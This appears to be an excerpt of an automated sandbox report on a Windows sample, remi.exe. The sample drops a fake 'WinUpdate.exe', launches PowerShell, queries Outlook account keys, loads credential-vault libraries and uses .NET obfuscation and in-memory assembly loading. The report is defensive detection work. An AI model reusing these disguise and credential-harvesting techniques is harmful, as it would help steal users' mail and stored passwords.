                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: pstorec.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: pstorec.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: riched20.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: usp10.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: msls31.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: riched20.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: usp10.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: msls31.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\remi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\remi.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: remi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: remi.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: remi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: aYVs.pdbSHA256 source: remi.exe
                    Source: Binary string: aYVs.pdb source: remi.exe

                    Data Obfuscation

                    barindex
                    Source: 0.2.remi.exe.7e60000.5.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.remi.exe.427e790.2.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: remi.exe, LogInGUI.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: 0.2.remi.exe.7820000.4.raw.unpack, hLPFS2mMBxRY0UiRNB.cs.Net Code: mTNebTTVq2 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.remi.exe.44190d8.3.raw.unpack, hLPFS2mMBxRY0UiRNB.cs.Net Code: mTNebTTVq2 System.Reflection.Assembly.Load(byte[])
                    Source: WinUpdate.exe.6.dr, LogInGUI.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: remi.exeStatic PE information: 0x8A8505E7 [Sun Aug 23 20:13:27 2043 UTC]
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,6_2_0041BCE3
                    Source: C:\Users\user\Desktop\remi.exeCode function: 0_2_0161F3F0 push esp; iretd 0_2_0161F3F1
                    Source: C:\Users\user\Desktop\remi.exeCode function: 0_2_0743C3DF pushad ; retf 0_2_0743C3E0
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_004567E0 push eax; ret 6_2_004567FE
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0045B9DD push esi; ret 6_2_0045B9E6
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00455EAF push ecx; ret 6_2_00455EC2
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00433FF6 push ecx; ret 6_2_00434009
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 7_2_00AFF3F0 push esp; iretd 7_2_00AFF3F1
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 7_2_0508C3DF pushad ; retf 7_2_0508C3E0
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_02E62806 push ecx; ret 11_2_02E62819
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_1000B146 push ecx; ret 11_2_1000B159
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_1002343D push esi; ret 11_2_10023446
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0044693D push ecx; ret 15_2_0044694D
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0044DB70 push eax; ret 15_2_0044DB84
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0044DB70 push eax; ret 15_2_0044DBAC
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_00451D54 push eax; ret 15_2_00451D61
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0A4
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0CC
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_00451D34 push eax; ret 16_2_00451D41
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_00444E71 push ecx; ret 16_2_00444E81
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_00414060 push eax; ret 17_2_00414074
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_00414060 push eax; ret 17_2_0041409C
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_00414039 push ecx; ret 17_2_00414049
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_004164EB push 0000006Ah; retf 17_2_004165C4
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_00416553 push 0000006Ah; retf 17_2_004165C4
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_00416555 push 0000006Ah; retf 17_2_004165C4
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 19_2_011FF3F0 push esp; iretd 19_2_011FF3F1
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 19_2_051AF4D7 pushfd ; iretd 19_2_051AF4E6
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 19_2_051A1CD6 push ds; retf 19_2_051A1CE2
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 19_2_070CC3DF pushad ; retf 19_2_070CC3E0
                    Source: remi.exeStatic PE information: section name: .text entropy: 7.959838162637272
                    Source: WinUpdate.exe.6.drStatic PE information: section name: .text entropy: 7.959838162637272
                    Source: 0.2.remi.exe.7820000.4.raw.unpack, y7A79aFCcp4R4WCsV47.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EEx8TcP5eq', 'IUl8hnkLfK', 'vCb8JjJDEU', 'UA98qgIwDh', 'LIe8Q6GAP3', 'r2Q8Rmm3te', 'Pgm8Uq56jV'
                    Source: 0.2.remi.exe.7820000.4.raw.unpack, sxQmvuFeZN1QPiVFSd5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ovyofYm86R', 'gOTo8xpdsT', 'SmTo3m1TI0', 'kUfooVbVd9', 'Ilno6sTEBZ', 'zvHo00h6EI', 'nI6oNjFREk'
                    Source: 0.2.remi.exe.7820000.4.raw.unpack, gRiNFyDnrDxxtC1qSs.csHigh entropy of concatenated method names: 'Dispose', 'qCqFBM030W', 'CUkSXxyYhj', 'kXxvYDaE8Q', 'ajRFr6iiWi', 'FYnFzkmO4L', 'ProcessDialogKey', 'JFiSC46Oga', 'lHbSF66Ze8', 'GiRSS4CAiW'
                    Source: 0.2.remi.exe.7820000.4.raw.unpack, tpk6qSlbWk2EvMNEOa.csHigh entropy of concatenated method names: 'L7MGpPOb2Y', 'o4JGrUjlfQ', 'pkX9CTMjjR', 'GC89FVIoYr', 'xiMGT0RLMo', 'pUHGhbCSnn', 'BALGJqidGR', 'o4MGqSO8J6', 'HvSGQapMm9', 'bWXGRnWp2Y'
                    Source: 0.2.remi.exe.7820000.4.raw.unpack, TL57LVeVktyFmmjckY.csHigh entropy of concatenated method names: 'powFwmXER2', 'iEsFmTEDFI', 'slWFOjiXV8', 'rckFuoxJ2f', 'd8QF4kXqru', 'JqYFddmLJG', 'nsC66a6JiBFCsEN3L1', 'rmb0k4xoH3Z9gR5UaI', 'LdaJT9WgJ52OKdp1XI', 'xGmFFQgpeL'
                    Source: 0.2.remi.exe.7820000.4.raw.unpack, Py8eFPYGgwAgFEcgiH.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gJ4SBroIwS', 'BTiSrr7jq0', 'xgZSzEYFYX', 'cfjnC0pqjN', 'VSDnFAss0U', 'nS7nSmQObd', 'FegnnF1u15', 'xml0IlkMTb6JGnosuJB'
                    Source: 0.2.remi.exe.7820000.4.raw.unpack, C0EiTbFFYEf6fNLURIj.csHigh entropy of concatenated method names: 'xE88rFbL2v', 'ko48zqFuZw', 'AIV3C8njyT', 'eU23FYaCP5', 'kpj3SnaZsk', 'lVj3nDkX3H', 'fB33erLI74', 'zGP3gfUyyQ', 'z9m3KNW2qL', 'yLp3DE1VUS'
                    Source: 0.2.remi.exe.7820000.4.raw.unpack, hn8Q9fWPQGCqM030WF.csHigh entropy of concatenated method names: 'oqDf4oxLAr', 'oUefGjPGv5', 'WEMffVaL9C', 'xQif3JRGIf', 'Nn4f6ovCne', 'iDafNQGgFE', 'Dispose', 'OCX9KCP78x', 'tS39DGBclI', 'TnI9YaJRZ4'
                    Source: 0.2.remi.exe.7820000.4.raw.unpack, mZVnhJRI0PNMqA6oCK.csHigh entropy of concatenated method names: 'ToString', 'Dk0dTOaAje', 'oDOdXePTYE', 'GNZdcw9Atq', 'KB3dkyWsFG', 'vfwds6Kg7Z', 'LBud1ko1jd', 'AEldAkEqVQ', 'anodVWpKwZ', 'khedvwux7O'
